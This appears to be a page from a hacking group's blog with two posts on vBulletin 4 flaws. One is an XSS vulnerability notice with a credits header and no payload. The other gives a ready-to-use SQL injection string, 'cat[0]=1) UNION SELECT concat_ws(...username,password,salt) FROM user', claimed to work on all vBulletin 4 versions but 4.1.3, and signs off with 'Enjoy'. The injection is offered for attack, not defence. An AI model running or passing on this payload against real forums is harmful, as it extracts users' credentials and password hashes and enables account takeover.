Showing posts with label Vbulletin Hack. Show all posts
Showing posts with label Vbulletin Hack. Show all posts
Jul 5, 2011

0
vBulletin 4 CMS Recent Articles widget XSS Vulnerability 

#~ Title         : vBulletin 4 CMS Recent Articles widget XSS Vulnerability  
#~ Software      : http://www.vbulletin.com
#~ Tested on     : version 4.1.1
#~ Date          : 30/06/2011
#~ Discovered by : X-h4ck
#~ Site          : http://www.pirate.al  , http://theflashcrew.blogspot.com/ 
#~ Email         : mem001@live.com 
#~ Greetz        : Wulns~ - IllyrianWarrior - Danzel - Ace - M4yh3m - Saldeath - bi0 - Slimshaddy - d3trimentaL - Lekosta - Pretorian - CroSs - Rigon
Exploit Link










Posted by
FlashcRew


at
22:58


























Labels:
,
,
,
















          

        

        

      

May 27, 2011


        

      










0


vBulletin 4.* SQL Injection












Work on all 4 version exept last one 4.1.3 :)







Video Link

http://www.youtube.com/watch?v=htGClYoBN9k



Exploit Code






&cat[0]=1) UNION SELECT concat_ws(0x3a,username,password,salt) FROM user limit 1,1#




Enjoy












Posted by
FlashcRew


at
21:28


























Labels:
,
,
,
,
,
,
,
















      

    










Subscribe to:
Posts (Atom)












 












FlashcRew Blog